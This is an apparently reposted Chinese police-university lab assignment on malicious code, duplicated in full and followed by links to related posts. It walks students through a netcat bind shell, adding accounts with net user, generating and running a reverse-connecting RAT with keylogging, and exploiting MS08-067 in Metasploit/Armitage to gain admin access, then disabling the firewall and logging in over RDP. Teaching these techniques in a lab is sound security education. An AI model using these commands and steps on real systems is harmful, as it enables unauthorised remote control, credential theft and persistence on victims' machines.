第四次实验 恶意代码技术
中国人民公安大学
Chinese people’ public security university
网络对抗技术
实验报告
实验四 |
恶意代码技术 |
学生姓名 |
金轩宇 |
年级 |
2015 |
区队 |
6 |
指导教师 |
高见 |
信息技术与网络安全学院
2018年10月15日
实验任务总纲
2018—2019 学年 第 一 学期
一、实验目的
1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
2.了解并熟悉常用的网络攻击工具,木马的基本功能;
3.达到巩固课程知识和实际应用的目的。
二、实验要求
1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。
2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。
3.软件工具可使用NC、MSF等。
4.实验结束后,保留电子文档。
三、实验步骤
1.准备
提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。
2.实验环境
描述实验所使用的硬件和软件环境(包括各种软件工具);
开机并启动软件office2003或2007、浏览器、加解密软件。
3.实验过程
1)启动系统和启动工具软件环境。
2)用软件工具实现实验内容。
4.实验报告
按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。
任务一 利用NC控制电脑
NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。
实验过程需要两个同学相互配合完成:
步骤一:
在受害者的机器 (同学A) 输入下面的命令: nc.exe -l -p port -e cmd.exe 进入监听模式
步骤二: 在攻击者的机器.(同学B) 输入下面的命令: nc ip port //连接victim_IP,然后得到一个shell。 (需要截图)
步骤三:
在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。(需要截图)
可以继续通过命令行做一些事情。
任务二 利用木马控制电脑
实验过程需要两个同学配合:
步骤一:
攻击者的机器. (同学A) 打开V2014.exe程序或则star RAT,这两个木马功能类似。
步骤二: 点击菜单栏中的“服务生成”,在弹出的配置服务端中,配置回连IP地址(攻击者IP)和端口号,并点击“生成”按钮,生成木马服务端。
步骤三:
将生成的木马可执行程序拷贝到受害者的机器,并双击运行。
步骤四:
在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。
1、控制主机
2、获取桌面
3、拷贝文件
4、键盘记录
6、重启电脑
中国人民公安大学
Chinese people’ public security university
网络对抗技术
实验报告
实验四 |
恶意代码技术 |
学生姓名 |
金轩宇 |
年级 |
2015 |
区队 |
6 |
指导教师 |
高见 |
信息技术与网络安全学院
2018年10月15日
实验任务总纲
2018—2019 学年 第 一 学期
一、实验目的
1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
2.了解并熟悉常用的网络攻击工具,木马的基本功能;
3.达到巩固课程知识和实际应用的目的。
二、实验要求
1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。
2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。
3.软件工具可使用NC、MSF等。
4.实验结束后,保留电子文档。
三、实验步骤
1.准备
提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。
2.实验环境
描述实验所使用的硬件和软件环境(包括各种软件工具);
开机并启动软件office2003或2007、浏览器、加解密软件。
3.实验过程
1)启动系统和启动工具软件环境。
2)用软件工具实现实验内容。
4.实验报告
按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。
任务一 利用NC控制电脑
NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。
实验过程需要两个同学相互配合完成:
步骤一:
在受害者的机器 (同学A)
输入下面的命令:
nc.exe -l -p port -e cmd.exe 进入监听模式
步骤二:
在攻击者的机器.(同学B)
输入下面的命令:
nc ip port //连接victim_IP,然后得到一个shell。 (需要截图)
步骤三:
在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user命令进行验证。(需要截图)
可以继续通过命令行做一些事情。
任务二 利用木马控制电脑
实验过程需要两个同学配合:
步骤一:
攻击者的机器. (同学A)
打开V2014.exe程序或则star RAT,这两个木马功能类似。
步骤二:
点击菜单栏中的“服务生成”,在弹出的配置服务端中,配置回连IP地址(攻击者IP)和端口号,并点击“生成”按钮,生成木马服务端。
步骤三:
将生成的木马可执行程序拷贝到受害者的机器,并双击运行。
步骤四:
在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。
- 文件管理,尝试拷贝文件
- 屏幕控制,尝试获取桌面
- 键盘记录,尝试获取对方击键记录
- 会话管理,重启对方机器,查看是否能自启动上线
会话管理,卸载对方的木马。
任务三 通过漏洞获取shell(合天平台中做) 所有过程截图写博客
windows ms08067 漏洞利用
在平台中获取shell之后,继续利用攻击机器使用
net user user pass /add
net localgroup administrators /add
命令向被攻击的机器中添加账户,并提升为管理员
然后用rdesktop 10.1.1.130 登陆对方的远程桌面
关闭xp系统主机的防火墙
查看攻击主机的ip地址和账户
启动Armitage
检索10.1.1.0/24网段
对130进行检测
搜寻到适应的攻击模块
配置攻击信息
利用Metasploit shall获得xp主机的管理员权限
利用cmd shall建立attacker的账户
利用rdesktop远程登录xp系统的attacker(密码:123465)
本次实验结束。
转载于:https://www.cnblogs.com/p201521460008/p/9796731.html
第四次实验 恶意代码技术相关推荐
- 实验四 恶意代码技术
学 号201421460014 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学 ...
- 实验四 恶意代码技术
实验报告 四 学 号 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 ...
- 网络对抗技术——实验四:恶意代码技术
中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 王天宇 年级 2015级 ...
- 网络对抗技术_实验四_恶意代码技术
中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 韩磊 年级 2014 区队 ...
- 实验四——恶意代码技术
学 号 201421430035 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 ...
- NetSarang软件中nssock2.dll模块被植入恶意代码技术分析与防护方案
NetSarang是一家提供安全连接解决方案的公司,该公司的产品主要包括Xmanager, Xmanager 3D, Xshell, Xftp 和Xlpd.最近,官方在2017年7月18日发布的软件被 ...
- 实验四恶意代码分析技术 201421430029
学 号:201421430029 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 ...
- 【实验报告】四恶意代码实验
学 号201421420040 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 ...
- 实验四 恶意代码
中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 冷其航 年级 14级 区队 ...
最新文章
- 常见测量矩阵的MATLAB实现
- OO第三单元JML总结
- python基础(part9)--容器类型之集合
- html中input不可编辑状态,css如何实现input不可编辑
- 【uoj#209】[UER #6]票数统计 组合数+乱搞
- rocketmq 同步刷盘和异步刷盘以及主从复制之同步复制和异步复制你理解了吗
- ftp上传图片出现550_FtpClient 实现文件上传
- IntelliJ IDEA导出设置
- 华为透露中国首个开源基金会将于近期正式运营!
- SpringSecurity入门
- 国家机构评测主流电视:长虹人工智能语音识别第一
- install-newton部署安装--------计算节点部署安装
- java定时执行bat_如何自动执行多个批处理命令
- 2018年终总结--修身篇
- oracle标准成本的维护,Oracle标准成本计算和平均成本计算比较
- SOLD格雷母线是什么?
- android 安装界面关闭程序,Android安装apk文件,不弹出安装完成的界面
- 小白必看:合理搭建巨量引擎账户结构要点总结!
- 8、C语言printf函数与scanf函数
- 编写一个静态方法 lg(), 接受一个整型参数 N,返回不大于 log2N 的最大整数。
热门文章
- webstorm怎么跑项目_快讯!明年厦门中考体育项目定了!初三家长抽的!其他地市抽到啥?...
- 上海11月份计算机方面的会议,计算机类 | 10月截稿会议信息6条
- 9个元素换6次达到排序序列_(算法四)高级排序(快速排序)
- 安卓手机管理器_@你,请查收这款最强的安卓文件管理器
- 用 Arthas 神器来诊断 HBase 异常进程
- 从零开始入门 K8s | Kubernetes 存储架构及插件使用
- CNCF 宣布 TUF 毕业 | 云原生生态周报 Vol. 33
- linux常见故障处理,[转载]Linux常见操作和故障处理汇总
- 1t硬盘怎么分区最好_网友问题解答:?最简单的方法教你电脑硬盘怎么分区?
- php中绘画控制包括什么,PhpStorm中绘画UML